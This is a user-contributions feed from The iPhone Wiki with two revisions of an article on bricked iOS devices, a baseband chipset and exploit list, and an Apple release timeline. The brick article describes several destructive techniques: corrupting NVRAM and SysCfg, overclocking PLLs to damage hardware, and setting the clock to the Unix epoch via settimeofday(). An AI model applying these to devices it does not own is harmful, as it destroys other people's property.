The iPhone Wiki - User contributions [en]

Brick

2021-07-12T02:53:28Z

Inflatable Man: /* Changing the system time to the Unix epoch */ Added that a process needs to be unsandboxed to use the settimeofday() syscall

A '''bricked''' device is a device that does not work. The direct metaphorical meaning is that the device is permanently damaged (making it as useless as a brick), but people use the term "bricked" for non-working conditions which range from easy to fix (such as a failed update) to impossible to fix (such as damaged baseband memory). A phone may be called "bricked" if it will not boot, will not respond to input, will not make calls, etc.

== Difficulty of bricking an iOS device ==

Using a jailbreaking tool cannot put a device into an unusable state on its own - if something goes wrong while jailbreaking, putting the device into [[DFU Mode]] will allow you to restore it via iTunes. Installing software via Cydia also cannot cause an unrecoverable state (unless very specifically designed to do so by a malicious person, which has not been seen "in the wild"). Other than that specific exception, if something goes wrong, DFU mode will still work.

== Types of "bricking" that can be easily fixed (not really "bricking") ==

=== Installing stock iOS on a device with a preserved baseband ===

Early unlock solutions could result in unusable (but recoverable) phones after installing an iOS update if you didn't take special steps. For people who used [[redsn0w]] to install the iPad baseband ([[06.15.00]]) on a compatible iPhone 3G or iPhone 3GS so that they could use [[ultrasn0w]] to carrier unlock it, upgrading or restoring iOS using "stock" (normal) IPSWs would make the phone unusable - until you made and restored a "custom" IPSW without a baseband update ([http://www.jailbreakqa.com/faq#32532 instructions]), and then reinstalled the iPad baseband using redsn0w. Avoiding doing a stock upgrade/restore (upgrading or restoring iOS using a "custom" IPSW) avoided this problem.

=== Intentionally modifying key parts of iOS: changing NVRAM variables to invalid values ===

In February 2015, [http://dayt0n.github.io/articles/dclr-override/ researchers released information] about how to change an [[NOR (NVRAM)|nvram]] variable called <code>DClr_override</code>. If this is changed to an invalid value for the device (valid values are not the same on all devices), and the device is rebooted, the device will not be able to boot. iOS 8.3 beta 4 (released in March 2015) [https://twitter.com/xerub/status/581744991229374464 removes the DClr_override variable], and later iOS versions will probably omit it as well. This means that restoring a device to iOS 8.3 beta 4 (or later) will fix the device, rendering it bootable once again.

=== Wiping the iBoot Partition ===
If you wipe the iBoot Partition, It will render the device unbootable. An easy way to do this is flash an [[InternalUI Builds|Internal UI Build]] and go to Settings/Internal Settings/CoreOS and press "Brick Device". This will wipe the iBoot Partition, along with the firmware. This is recoverable by restoring the device, as the device will be in DFU mode.

== Types of bricking that may be hard to fix ==

=== Changing MAC address to invalid address ===

If you change your device's MAC address to something invalid (for example if you're attempting to change your [[UDID]]), your internet won't work again until you fix the MAC address (using MobileTerminal or similar). This persists even if you restore -- so you can make this really really hard to fix if you restore and there's no jailbreak available, if the available jailbreaks don't include afc2 and other workarounds aren't working, etc. [http://www.jailbreakqa.com/questions/277646/stuck-after-mac-address-change-can-i-revive-it Here's a JailbreakQA thread about this] and [http://www.jailbreakqa.com/questions/211048/how-to-install-afc2add-without-using-wi-fi-in-a-jailbroken-ipad-3-with-704 another one].

=== Intentionally modifying key parts of iOS: other ways ===

If you purposefully erase / zero out your [[NOR]], then you will have trouble doing a DFU restore because important information from the [[NOR (SysCfg)|SysCfg]] section will not be available.

[http://www.reddit.com/r/jailbreak/comments/1m3jo6/how_much_torture_kernel_user_based_etc_would_it/cc5g8nj See winocm's explanation of several related ways to brick a device]:

<blockquote>
* Erase SysCfg/replace it with 0xFFs.
* Destroy the 'SrNm' tag in the SysCfg, it won't activate then.
* Set all clock gates enabled and set PLL frequencies to mad numbers, THIS WILL DAMAGE THE HARDWARE.
* Run constant NAND stress tests to wear out NAND pages.
* Set the 'display-timing' nvram variable to some other garbage. iPod touch (2nd generation)/(3rd generation) does weird things with that.

If you know how the hardware works, this can be done from an iBoot/kernel level.
</blockquote>

=== Installing certain [[Internal Firmware]]s on the wrong devices ===
If you install certain factory firmwares on certain devices, the devices may be bricked permanently.
Examples are installing [[HoodooYabuli 9B3176n]] on an iPad 1, or installing [[ApexNanshan 8A2180g]] on a iPhone 3G. This may be due to NVRAM.

=== Making the wrong modifications to the baseband ===

One way to irreversibly brick a device in software is to flash an invalid [[Baseband Bootloader|baseband bootloader]], provided it has a baseband. Most other bad flash scenarios are recoverable some way or another.

Another way to brick the baseband is by installing baseband [[06.15.00]] on an incompatible device. [[redsn0w]] has an option to install this baseband on the [[N82AP|iPhone 3G]] or [[N88AP|iPhone 3GS]] in order to get a baseband version that is unlockable with [[ultrasn0w]]. This is a nice way to get an unlock, because the [[K48AP|iPad]], the [[N82AP|iPhone 3G]] and the [[N88AP|iPhone 3GS]] all share the same [[Baseband Device]], but the [[K48AP|iPad]] has a newer version number in its baseband. That way people can actually downgrade by installing a higher version (there are no [[APTicket]] checks in these devices). This has known side effects, like losing [[GPS]] functionality (this baseband comes from an iPad, which has a different GPS module).

It was possible to brick an [[N88AP|iPhone 3GS]] with this method. In fall 2011, Apple replaced the [[NOR]] flash, which rendered the aforementioned 06.15.00 trick useless. The previous type of NOR was marked 36MY1EE, and they switched to 36MY1EG and 36MY1EH. These new [[NOR]] flash chips seem to work with the newer baseband versions in the [[N88AP|iPhone 3GS]], but are not supported with the old [[06.15.00]] baseband. Therefore installing this version will brick your device if you have a newer [[NOR]] flash, as you (currently) cannot go back and install anything else. To check before installation, you can try checking the serial number, which reveals the production year/week in the first 3-5 digits. 2011 week 34 appears safe, while weeks 35 and 36 seem iffy, and week 37 is not safe. Ultimately, the most sure-fire way would be to open the device and check the chip type.

=== Changing the system time to the Unix epoch ===

Setting the system time to the Unix epoch (January 1, 1970) and attempting to reboot the device almost irreversibly bricks it. Normally, without a jailbreak, setting the time like this isn't possible with the Settings app, although it used to be possible before iOS 9.3.1. However, as the root user or with the com.apple.timed key set to "YES" in an executable's entitlements, using the settimeofday() system call in unsandboxed software allows the system time to be changed to the Unix epoch by setting tv_sec and tv_usec in a timeval struct (which is passed as the first argument) to 0. When the device attempts to boot with the time set, it will fail to boot. This cannot be fixed normally with [[Recovery Mode]] or [[DFU Mode]]. Disconnecting and then reconnecting the battery resets the time which fixes this. Another way to fix this, is by waiting for the battery to fully deplete, which also resets the time.

Brick

2021-07-12T02:45:19Z

Inflatable Man: /* Types of bricking that may be hard to fix */ Added another way to brick the device

A '''bricked''' device is a device that does not work. The direct metaphorical meaning is that the device is permanently damaged (making it as useless as a brick), but people use the term "bricked" for non-working conditions which range from easy to fix (such as a failed update) to impossible to fix (such as damaged baseband memory). A phone may be called "bricked" if it will not boot, will not respond to input, will not make calls, etc.

== Difficulty of bricking an iOS device ==

Using a jailbreaking tool cannot put a device into an unusable state on its own - if something goes wrong while jailbreaking, putting the device into [[DFU Mode]] will allow you to restore it via iTunes. Installing software via Cydia also cannot cause an unrecoverable state (unless very specifically designed to do so by a malicious person, which has not been seen "in the wild"). Other than that specific exception, if something goes wrong, DFU mode will still work.

== Types of "bricking" that can be easily fixed (not really "bricking") ==

=== Installing stock iOS on a device with a preserved baseband ===

Early unlock solutions could result in unusable (but recoverable) phones after installing an iOS update if you didn't take special steps. For people who used [[redsn0w]] to install the iPad baseband ([[06.15.00]]) on a compatible iPhone 3G or iPhone 3GS so that they could use [[ultrasn0w]] to carrier unlock it, upgrading or restoring iOS using "stock" (normal) IPSWs would make the phone unusable - until you made and restored a "custom" IPSW without a baseband update ([http://www.jailbreakqa.com/faq#32532 instructions]), and then reinstalled the iPad baseband using redsn0w. Avoiding doing a stock upgrade/restore (upgrading or restoring iOS using a "custom" IPSW) avoided this problem.

=== Intentionally modifying key parts of iOS: changing NVRAM variables to invalid values ===

In February 2015, [http://dayt0n.github.io/articles/dclr-override/ researchers released information] about how to change an [[NOR (NVRAM)|nvram]] variable called <code>DClr_override</code>. If this is changed to an invalid value for the device (valid values are not the same on all devices), and the device is rebooted, the device will not be able to boot. iOS 8.3 beta 4 (released in March 2015) [https://twitter.com/xerub/status/581744991229374464 removes the DClr_override variable], and later iOS versions will probably omit it as well. This means that restoring a device to iOS 8.3 beta 4 (or later) will fix the device, rendering it bootable once again.

=== Wiping the iBoot Partition ===
If you wipe the iBoot Partition, It will render the device unbootable. An easy way to do this is flash an [[InternalUI Builds|Internal UI Build]] and go to Settings/Internal Settings/CoreOS and press "Brick Device". This will wipe the iBoot Partition, along with the firmware. This is recoverable by restoring the device, as the device will be in DFU mode.

== Types of bricking that may be hard to fix ==

=== Changing MAC address to invalid address ===

If you change your device's MAC address to something invalid (for example if you're attempting to change your [[UDID]]), your internet won't work again until you fix the MAC address (using MobileTerminal or similar). This persists even if you restore -- so you can make this really really hard to fix if you restore and there's no jailbreak available, if the available jailbreaks don't include afc2 and other workarounds aren't working, etc. [http://www.jailbreakqa.com/questions/277646/stuck-after-mac-address-change-can-i-revive-it Here's a JailbreakQA thread about this] and [http://www.jailbreakqa.com/questions/211048/how-to-install-afc2add-without-using-wi-fi-in-a-jailbroken-ipad-3-with-704 another one].

=== Intentionally modifying key parts of iOS: other ways ===

If you purposefully erase / zero out your [[NOR]], then you will have trouble doing a DFU restore because important information from the [[NOR (SysCfg)|SysCfg]] section will not be available.

[http://www.reddit.com/r/jailbreak/comments/1m3jo6/how_much_torture_kernel_user_based_etc_would_it/cc5g8nj See winocm's explanation of several related ways to brick a device]:

<blockquote>
* Erase SysCfg/replace it with 0xFFs.
* Destroy the 'SrNm' tag in the SysCfg, it won't activate then.
* Set all clock gates enabled and set PLL frequencies to mad numbers, THIS WILL DAMAGE THE HARDWARE.
* Run constant NAND stress tests to wear out NAND pages.
* Set the 'display-timing' nvram variable to some other garbage. iPod touch (2nd generation)/(3rd generation) does weird things with that.

If you know how the hardware works, this can be done from an iBoot/kernel level.
</blockquote>

=== Installing certain [[Internal Firmware]]s on the wrong devices ===
If you install certain factory firmwares on certain devices, the devices may be bricked permanently.
Examples are installing [[HoodooYabuli 9B3176n]] on an iPad 1, or installing [[ApexNanshan 8A2180g]] on a iPhone 3G. This may be due to NVRAM.

=== Making the wrong modifications to the baseband ===

One way to irreversibly brick a device in software is to flash an invalid [[Baseband Bootloader|baseband bootloader]], provided it has a baseband. Most other bad flash scenarios are recoverable some way or another.

Another way to brick the baseband is by installing baseband [[06.15.00]] on an incompatible device. [[redsn0w]] has an option to install this baseband on the [[N82AP|iPhone 3G]] or [[N88AP|iPhone 3GS]] in order to get a baseband version that is unlockable with [[ultrasn0w]]. This is a nice way to get an unlock, because the [[K48AP|iPad]], the [[N82AP|iPhone 3G]] and the [[N88AP|iPhone 3GS]] all share the same [[Baseband Device]], but the [[K48AP|iPad]] has a newer version number in its baseband. That way people can actually downgrade by installing a higher version (there are no [[APTicket]] checks in these devices). This has known side effects, like losing [[GPS]] functionality (this baseband comes from an iPad, which has a different GPS module).

It was possible to brick an [[N88AP|iPhone 3GS]] with this method. In fall 2011, Apple replaced the [[NOR]] flash, which rendered the aforementioned 06.15.00 trick useless. The previous type of NOR was marked 36MY1EE, and they switched to 36MY1EG and 36MY1EH. These new [[NOR]] flash chips seem to work with the newer baseband versions in the [[N88AP|iPhone 3GS]], but are not supported with the old [[06.15.00]] baseband. Therefore installing this version will brick your device if you have a newer [[NOR]] flash, as you (currently) cannot go back and install anything else. To check before installation, you can try checking the serial number, which reveals the production year/week in the first 3-5 digits. 2011 week 34 appears safe, while weeks 35 and 36 seem iffy, and week 37 is not safe. Ultimately, the most sure-fire way would be to open the device and check the chip type.

=== Changing the system time to the Unix epoch ===

Setting the system time to the Unix epoch (January 1, 1970) and attempting to reboot the device almost irreversibly bricks it. Normally, without a jailbreak, setting the time like this isn't possible with the Settings app, although it used to be possible before iOS 9.3.1. However, as the root user or with the com.apple.timed key set to "YES" in an executable's entitlements, using the settimeofday() system call allows the system time to be changed to the Unix epoch by setting tv_sec and tv_usec in a timeval struct (which is passed as the first argument) to 0. When the device attempts to boot with the time set, it will fail to boot. This cannot be fixed normally with [[Recovery Mode]] or [[DFU Mode]]. Disconnecting and then reconnecting the battery resets the time which fixes this. Another way to fix this, is by waiting for the battery to fully deplete, which also resets the time.

Baseband Device

2021-07-11T23:22:26Z

Inflatable Man: Capitalized "it"

the '''Baseband Device''' is the chipset that all [[iPhone|iPhones]] and cellular models of the [[Apple Watch]], [[iPad]], [[List_of_iPad_Airs|iPad Air]], [[List_of_iPad_minis|iPad mini]], and [[iPad Pro]] use that manages all the functions which require a cellular antenna. It has its own RAM and Firmware in NOR flash, separate from the [[ARM]] core resources. The baseband is a resource to the OS. The Wi-Fi and Bluetooth are managed by the main CPU, although the baseband stores it's MAC addresses in its NVRAM.

See also: [[Baseband Commands]] and [[iOS Baseband Tools]].
==Device List==
<onlyinclude> 
=====[[PMB8876]] S-Gold 2=====
* [[M68AP|iPhone]]

=====[[PMB8878]] X-Gold 608=====
* [[K48AP|iPad]]
* [[N82AP|iPhone 3G]]
* [[N88AP|iPhone 3GS]]

=====[[XMM 6180]] X-Gold 618=====
* iPad 2 [[K94AP|(iPad2,2)]]
* iPhone 4 [[N90AP|(iPhone3,1)]] and [[N90BAP|(iPhone3,2)]]

=====[[MDM6600]]=====
* iPad 2 [[K95AP|(iPad2,3)]]
* iPhone 4 [[N92AP|(iPhone3,3)]]

=====[[MDM6610]]=====
* [[iPhone 4S]]

=====[[MDM9600]]=====
* [[iPad (3rd generation)]]

=====[[MDM9615]]=====
* [[iPad (4th generation)]]
* [[iPad Air]]
* [[iPad mini]]
* [[iPad mini 2]]
* [[iPad mini 3]]
* [[iPhone 5]]
* [[iPhone 5c]]
* [[iPhone 5s]]

=====[[MDM9625]]=====
* [[iPad (5th generation)]]
* [[iPad Air 2]]
* [[iPad Pro (12.9-inch)]]
* [[iPad mini 4]]
* [[iPhone 6]]
* [[iPhone 6 Plus]]
* [[iPhone SE (1st generation)]]

=====[[MDM9635]]=====
* [[Apple Watch Series 3]]
* [[iPad (6th generation)]]
* [[iPad Pro (9.7-inch)]]
* [[iPhone 6s]]
* [[iPhone 6s Plus]]

=====[[MDM9645]]=====
* [[iPad Pro (10.5-inch)]]
* [[iPad Pro (12.9-inch) (2nd generation)]]
* [[iPhone 7]]
* [[iPhone 7 Plus]]

=====[[PMB9943]] X-Gold 736=====
* [[iPhone 7]]
* [[iPhone 7 Plus]]

=====[[MDM9655]]=====
* [[iPhone 8]]
* [[iPhone 8 Plus]]
* [[iPhone X]]

=====[[PMB9948]] X-Gold 748=====
* [[iPhone 8]]
* [[iPhone 8 Plus]]
* [[iPhone X]]

=====[[PMB9955]] X-Gold 756=====
* [[Apple Watch Series 4]]
* [[Apple Watch Series 5]]
* [[Apple Watch SE]]
* [[Apple Watch Series 6]]
* [[iPad (7th generation)]]
* [[iPad (8th generation)]]
* [[iPad Air (3rd generation)]]
* [[iPad Pro (11-inch)]]
* [[iPad Pro (12.9-inch) (3rd generation)]]
* [[iPad mini (5th generation)]]
* [[iPhone XR]]
* [[iPhone XS]]
* [[iPhone XS Max]]

=====[[PMB9960]] X-Gold 766=====
* [[iPad Air (4th generation)]]
* [[iPad Pro (11-inch) (2nd generation)]]
* [[iPad Pro (12.9-inch) (4th generation)]]
* [[iPhone 11]]
* [[iPhone 11 Pro]]
* [[iPhone 11 Pro Max]]
* [[iPhone SE (2nd generation)]]

=====[[SDX55M]]=====
* [[iPad Pro (11-inch) (3rd generation)]]
* [[iPad Pro (12.9-inch) (5th generation)]]
* [[iPhone 12 mini]]
* [[iPhone 12]]
* [[iPhone 12 Pro]]
* [[iPhone 12 Pro Max]]
</onlyinclude> 

==[[Seczone]]==
This is the area in the baseband where the lock state is stored.

===Layout===
0x400--NCK token
0xA00--IMEI signature
0xB00--IMEI
0xC00--Locks table

===Encryption===
Many of the sections are encrypted using [[Baseband TEA Keys|TEA]] based off the [[CHIPID]] and [[NORID]]. See [[NCK Brute Force]] for more info.

==Exploits==
* [[SIM hacks]]

===[[PMB8876]] S-Gold 2===
* [[Fakeblank]]
* [[IPSF]]
* [[Minus 0x400]]
* [[Minus 0x20000 with Back Extend Erase]]

===[[PMB8878]] X-Gold 608===
* [[JerrySIM]]
* [[AT+stkprof]]
* [[AT+XLOG Vulnerability]]
* [[AT+XEMN Heap Overflow]]
* [[AT+XAPP Vulnerability]]
* [[AT+FNS]]

===[[XMM 6180]] X-Gold 618===
* [[AT+XAPP Vulnerability]]

===[[MDM6600]]===
* None

===[[MDM6610]]===
* None

===[[MDM9600]]===
* None

===[[MDM9615]]===
* None

===[[MDM9625]]===
* None

===[[MDM9635]]===
* None

===[[MDM9645]]===
* None

===[[PMB9943]] X-Gold 736===
* None

===[[MDM9655]]===
* None

===[[PMB9948]] X-Gold 748===
* None

===[[PMB9955]] X-Gold 756===
* None

===[[PMB9960]] X-Gold 766===
* None

===[[SDX55M]]===
* None

==Theoretical Attacks==
* [[NCK Brute Force]]
* [[Baseband JTAG]]

==Boot Chain==
[[Baseband Bootrom|bootrom]]->[[Baseband Bootloader|bootloader]]->[[Baseband Firmware|firmware]]

[[Category:Baseband]]

Timeline

2021-06-12T19:50:51Z

Inflatable Man: /* 2021 */ Added the new versions from WWDC to the timeline

{{float toc|right}}
{{see also|The iPhone Wiki:Current events}}
== 2021 ==
== June ==
* 7 June -- iOS/iPadOS 15 beta 1, tvOS 15, and watchOS 8 released.

=== May ===
* 3 May -- macOS 11.3.1, iOS/iPadOS 14.5.1, 12.5.3 and watchOS 7.4.1 released.

=== April ===
* 30 April -- audioOS 14.6 beta 2, iOS/iPadOS 14.6 beta 2, tvOS 14.6 beta 2 and watchOS 7.5 beta 2 released.
* 26 April -- macOS 11.3, bridgeOS 5.3, audioOS 14.5, iOS/iPadOS 14.5, tvOS 14.5, Apple TV Software Update 7.6.3 and watchOS 7.4 released.
* 22 April -- audioOS 14.6 beta, iOS/iPadOS 14.6 beta, tvOS 14.6 beta and watchOS 7.5 beta released.
* 21 April -- macOS 11.4 beta released.
* 20 April -- [[J305AP|Apple TV 4K (2nd generation)]], [[AirTags]], [[iPad Pro (11-inch) (3rd generation)]], [[iPad Pro (12.9-inch) (5th generation)]] and [[iMac (24-inch, M1, 2021)]] announced. macOS 11.3 [[Release Candidate|RC]], audioOS 14.5 [[Release Candidate|RC]], iOS/iPadOS 14.5 [[Release Candidate|RC]], tvOS 14.5 [[Release Candidate|RC]] and watchOS 7.4 [[Release Candidate|RC]] released.
* 13 April -- macOS 11.3 beta 8 and iOS/iPadOS 14.5 beta 8 released.
* 8 April -- macOS 11.3 beta 7 released.
* 7 April -- audioOS 14.5 beta 7, iOS/iPadOS 14.5 beta 7, tvOS 14.5 beta 7 and watchOS 7.4 beta 7 released.
* 1 April -- [[Taurine]] released with support for iOS/iPadOS 14.0-14.3.

=== March ===
* 31 March -- macOS 11.3 beta 6, audioOS 14.5 beta 6, iOS/iPadOS 14.5 beta 6, watchOS 7.4 beta 6 and tvOS 14.5 beta 6 released.
* 26 March -- iOS/iPadOS 12.5.2, 14.4.2 and watchOS 7.3.3 released.
* 23 March -- macOS 11.3 beta 5, audioOS 14.5 beta 5, iOS/iPadOS 14.5 beta 5, watchOS 7.4 beta 5 and tvOS 14.5 beta 5 released.
* 16 March -- [[kok3shi]] released to jailbreak 64-bit devices running iOS 9.3.2 - 9.3.5.
* 15 March -- macOS 11.3 beta 4, audioOS 14.5 beta 4, iOS/iPadOS 14.5 beta 4, watchOS 7.4 beta 4 and tvOS 14.5 beta 4 released.
* 9 March -- macOS 11.2.3, iOS/iPadOS 14.4.1 and watchOS 7.3.2 released.
* 4 March -- watchOS 7.4 beta 3 released.
* 3 March -- audioOS 14.5 beta 3 and tvOS 14.5 beta 3 released.
* 2 March -- macOS 11.3 beta 3 and iOS/iPadOS 14.5 beta 3 released.

=== February ===
* 28 February -- [[unc0ver]] updated to version 6.0.0, which add support for iOS 12.4.9-12.5.1, 13.5.1-13.7 and 14.0-14.3.
* 25 February -- macOS 11.2.2 released.
* 17 February -- macOS 11.3 beta 2 released.
* 16 February -- iOS/iPadOS 14.5 beta 2, tvOS 14.5 beta 2, and watchOS 7.4 beta 2 released.
* 15 February -- watchOS 7.3.1 for [[Apple Watch Series 5]] and [[Apple Watch SE]] and macOS 11.2.1 (20D75) released.
* 9 February -- macOS 11.2.1 (20D74) released.
* 4 February -- Revised iOS/iPadOS 14.5 beta released.
* 2 February -- macOS 11.3 beta released.
* 1 February -- audioOS 14.5 beta, iOS/iPadOS 14.5 beta, tvOS 14.5 beta, and watchOS 7.4 beta released.

=== January ===
* 28 January -- macOS 11.2 [[Release Candidate|RC]] 3 released.
* 26 January -- audioOS 14.4, iOS/iPadOS 14.4, tvOS 14.4, and watchOS 7.3 released.
* 25 January -- macOS 11.2 [[Release Candidate|RC]] 2 released.
* 21 January -- audioOS 14.4 [[Release Candidate|RC]], macOS 11.2 [[Release Candidate|RC]], iOS/iPadOS 14.4 [[Release Candidate|RC]], tvOS 14.4 [[Release Candidate|RC]], and watchOS 7.3 [[Release Candidate|RC]] released.
* 13 January -- audioOS 14.4 beta 2, macOS 11.2 beta 2, iOS/iPadOS 14.4 beta 2, tvOS 14.4 beta 2, and watchOS 7.3 beta 2 released.
* 11 January -- iOS/iPadOS 12.5.1 released.

== 2020 ==
=== December ===
* 16 December -- audioOS 14.4 beta, macOS 11.2 beta, iOS/iPadOS 14.4 beta, tvOS 14.4 beta, and watchOS 7.3 beta released.
* 15 December -- audioOS 14.3 released.
* 14 December -- bridgeOS 5.1, macOS 11.1, iOS/iPadOS 12.5 and 14.3, tvOS 14.3, Apple TV Software Update 7.6.2/iOS 8.4.6, and watchOS 6.3 and 7.2 released.
* 10 December -- macOS 11.1 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]] 2 released.
* 8 December -- audioOS 14.3 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]], tvOS 14.3 [[Release Candidate|RC]], and watchOS 7.2 [[Release Candidate|RC]] released.
* 7 December -- audioOS 14.2.1 released.
* 2 December -- [[Chimera]] updated to support up to 12.4.9 on pre-A12. audioOS 14.3 beta 3, iOS/iPadOS 14.3 beta 3, tvOS 14.3 beta 3, and watchOS 7.2 beta 3 released.

=== November ===
* 20 November -- [[Odyssey]] 1.2 released for iOS 13.0-13.7.
* 19 November -- iOS 14.2.1 for all iPhone 12 models released.
* 18 November -- iOS 14.2 (18B111) for all iPhone 12 models, audioOS 14.3 beta 2, tvOS 14.3 beta 2, and watchOS 7.2 beta 2 released.
* 17 November -- iOS/iPadOS 14.3 beta 2 released.
* 12 November -- audioOS 14.3 beta, iOS/iPadOS 14.3 beta, tvOS 14.3 beta, and watchOS 7.2 beta released.
* 5 November -- audioOS 14.2, iOS/iPadOS 12.4.9 and 14.2, tvOS 14.2, watchOS 5.3.9, 6.2.9 and 7.1, and 7.6.1/8.4.4 (12H911) for [[Apple TV (3rd generation)]] released.
* 2 November —- tvOS 14.2 RC and watchOS 7.1 RC released.

=== October ===
* 30 October —- iOS/iPadOS 14.2 Release Candidate (RC) released.
* 22 October -- watchOS 7.1 beta 4 released.
* 20 October -- iOS/iPadOS 14.1, audioOS 14.1, and tvOS 14.2 beta 4 released.
* 19 October -- watchOS 7.0.3 for [[Apple Watch Series 3]] released.
* 13 October -- audioOS 14.2 beta 3, iOS/iPadOS 14.1 [[Golden Master|GM]], 14.2 beta 3, tvOS 14.2 beta 3, and watchOS 7.1 beta 3 released. [[iPhone 12 mini]], [[iPhone 12]], [[iPhone 12 Pro]], and [[iPhone 12 Pro Max]] announced.
* 12 October -- watchOS 7.0.2 released.
* 5 October -- tvOS 14.0.2 released.

=== September ===
* 29 September -- audioOS 14.2 beta 2, iOS/iPadOS 14.2 beta 2, tvOS 14.2 beta 2, and watchOS 7.1 beta 2 released.
* 24 September -- iOS/iPadOS 14.0.1, tvOS 14.0.1 and watchOS 7.0.1 released.
* 23 September -- iPadOS 14.2 beta (18B5052i) for [[iPad (8th generation)]] released.
* 17 September -- audioOS 14.2 beta, iOS/iPadOS 14.2 beta, tvOS 14.2 beta, and watchOS 7.1 beta released.
* 16 September -- iOS/iPadOS 14.0, tvOS 14.0, watchOS 7.0, and 7.6/8.4.4 (12H903) for [[Apple TV (3rd generation)]] released.
* 15 September -- iOS/iPadOS 14.0 [[Golden Master|GM]], tvOS 14.0 [[Golden Master|GM]], and watchOS 7.0 [[Golden Master|GM]] released. [[iPad (8th generation)]], [[iPad Air (4th generation)]], [[Apple Watch SE]] and [[Apple Watch Series 6]] announced at "Time Flies" Event.
* 9 September -- audioOS 14.1 beta 8, iOS/iPadOS 14.0 beta 8, tvOS 14.0 beta 8, and watchOS 7.0 beta 8 released.
* 3 September -- audioOS 14.1 beta 7, iOS/iPadOS 14.0 beta 7, and tvOS 14.0 beta 7 released.
* 1 September -- iOS/iPadOS 13.7 released.

=== August ===
* 29 August -- [[Odyssey]] released to jailbreak iOS/iPadOS 13.0-13.5 on A9-A13 semi-untethered.
* 26 August -- iOS/iPadOS 13.7 beta released.
* 25 August -- audioOS 14.1 beta 6, iOS/iPadOS 14.0 beta 6, tvOS 14.0 beta 6, and watchOS 7.0 beta 6 released.
* 18 August -- audioOS 14.1 beta 5, iOS/iPadOS 14.0 beta 5, tvOS 14.0 beta 5, and watchOS 7.0 beta 5 released.
* 12 August -- iOS/iPadOS 13.6.1 released.
* 4 August -- audioOS 14 beta 4, iOS/iPadOS 14.0 beta 4, tvOS 14.0 beta 4, and watchOS 7.0 beta 4 released.

=== July ===
* 22 July -- audioOS 14 beta 3, iOS/iPadOS 14.0 beta 3, tvOS 14.0 beta 3, and watchOS 7.0 beta 3 released.
* 9 July -- iOS/iPadOS 13.6 [[Golden Master|GM]], tvOS 13.4.8 [[Golden Master|GM]], and watchOS 6.2.8 [[Golden Master|GM]] released. First public beta's of iOS 14 and tvOS 14 released.
* 7 July -- audioOS 14 beta 2, iOS/iPadOS 14.0 beta 2, tvOS 14.0 beta 2, and watchOS 7.0 beta 2 released.

=== June ===
* 30 June -- iOS/iPadOS 13.6 beta 3, tvOS 13.4.8 beta 3, and watchOS 6.2.8 beta 3 released.
* 22 June -- audioOS 14 beta, iOS 14, tvOS 14 and watchOS 7 announced with first beta released.
* 10 June -- watchOS 6.2.8 beta 2 released.
* 9 June -- iOS/iPadOS 13.6 beta 2 and tvOS 13.4.8 beta 2 released.
* 3 June -- tvOS 13.4.8 beta and watchOS 6.2.8 beta released.
* 1 June -- audioOS 13.4.6, iOS/iPadOS 13.5.1 and 13.5.5 beta, tvOS 13.4.6 and watchOS 6.2.6 released.

=== May ===
* 26 May -- [[unc0verTV]] 5.1.0~b1 released to jailbreak [[J42dAP|Apple TV HD]] and [[J105aAP|Apple TV 4K]] running tvOS 11.0 through 13.4.5.
* 23 May -- [[unc0ver]] updated to 5.0.0 to jailbreak devices running iOS 11.0 through 13.5.
* 20 May -- iOS 12.4.7, iOS/iPadOS 13.5, tvOS 13.4.5 and audioOS 13.4.5 released.
* 18 May -- iOS/iPadOS 13.5 [[Golden Master|GM]], tvOS 13.4.5 [[Golden Master|GM]], watchOS 5.3.7 and watchOS 6.2.5 released.
* 14 May -- watchOS 6.2.5 beta 5 released.
* 6 May -- iOS/iPadOS 13.5 beta 4, tvOS 13.4.5 beta 4 and watchOS 6.2.5 beta 4 released.

=== April ===
* 29 April -- iOS/iPadOS 13.5 beta 3, tvOS 13.4.5 beta 3, and watchOS 6.2.5 beta 3 released.
* 23 April -- iOS 13.4.1 released for [[D79AP|iPhone SE (2nd generation)]].
* 15 April -- iOS/iPadOS 13.4.5 beta 2, tvOS 13.4.5 beta 2, and watchOS 6.2.5 beta 2 released.
* 8 April -- watchOS 6.2.1 released.
* 7 April -- iOS/iPadOS 13.4.1 released.
* 1 April -- watchOS 6.2.5 beta released.

=== March ===
* 31 March -- iOS/iPadOS 13.4.5 beta and tvOS 13.4.5 beta released.
* 24 March -- audioOS 13.4, bridgeOS 4.4, iOS 12.4.6, iOS/iPadOS 13.4, tvOS 13.4, Apple TV Software Update 7.5, watchOS 5.3.6 and 6.2 released.
* 18 March -- iOS/iPadOS 13.4 beta 6, tvOS 13.4 beta 6 and watchOS 6.2 beta 6 released.
* 11 March -- watchOS 6.2 beta 5 released.
* 10 March -- iOS/iPadOS 13.4 beta 5 and tvOS 13.4 beta 5 released.
* 4 March -- watchOS 6.2 beta 4 released.
* 3 March -- iOS/iPadOS 13.4 beta 4 and tvOS 13.4 beta 4 released.

=== February ===
* 26 February -- iOS/iPadOS 13.4 beta 3, tvOS 13.4 beta 3 and watchOS 6.2 beta 3 released.
* 25 February -- [[unc0ver]] updated to support A8-A11 devices running iOS/iPadOS 13.0-13.3.
* 19 February -- iOS/iPadOS 13.4 beta 2, tvOS 13.4 beta 2 and watchOS 6.2 beta 2 released.
* 18 February -- watchOS 5.3.5 released.
* 15 February -- [[unc0ver]] updated to support A12 and A13 devices running iOS/iPadOS 13.0-13.3.
* 5 February -- iOS/iPadOS 13.4 beta, tvOS 13.4 beta and watchOS 6.2 beta released.

=== January ===
* 28 January -- iOS/iPadOS 13.3.1, tvOS 13.3.1, watchOS 6.1.2 and iOS 12.4.5 released.
* 22 January -- iOS/iPadOS 13.3.1 beta 3, tvOS 13.3.1 beta 3 and watchOS 6.1.2 beta 3 released.
* 17 January -- iOS/iPadOS 13.3.1 beta 2, tvOS 13.3.1 beta 2 and watchOS 6.1.2 beta 2 released.

== 2019 ==
=== December ===
* 17 December -- iOS/iPadOS 13.3.1 beta, tvOS 13.3.1 beta and watchOS 6.1.2 beta released.
* 10 December -- audioOS 13.3, iOS/iPadOS 13.3, tvOS 13.3 and watchOS 6.1.1 released
* 5 December -- iOS/iPadOS 13.3 beta 4, tvOS 13.3 beta 4 and watchOS 6.1.1 beta 4 released.

=== November ===
* 20 November -- iOS/iPadOS 13.3 beta 3, tvOS 13.3 beta 3 and watchOS 6.1.1 beta 3 released.
* 18 November -- iOS/iPadOS 13.2.3 released.
* 12 November -- iOS/iPadOS 13.3 beta 2, tvOS 13.3 beta 2 and watchOS 6.1.1 beta 2 released.
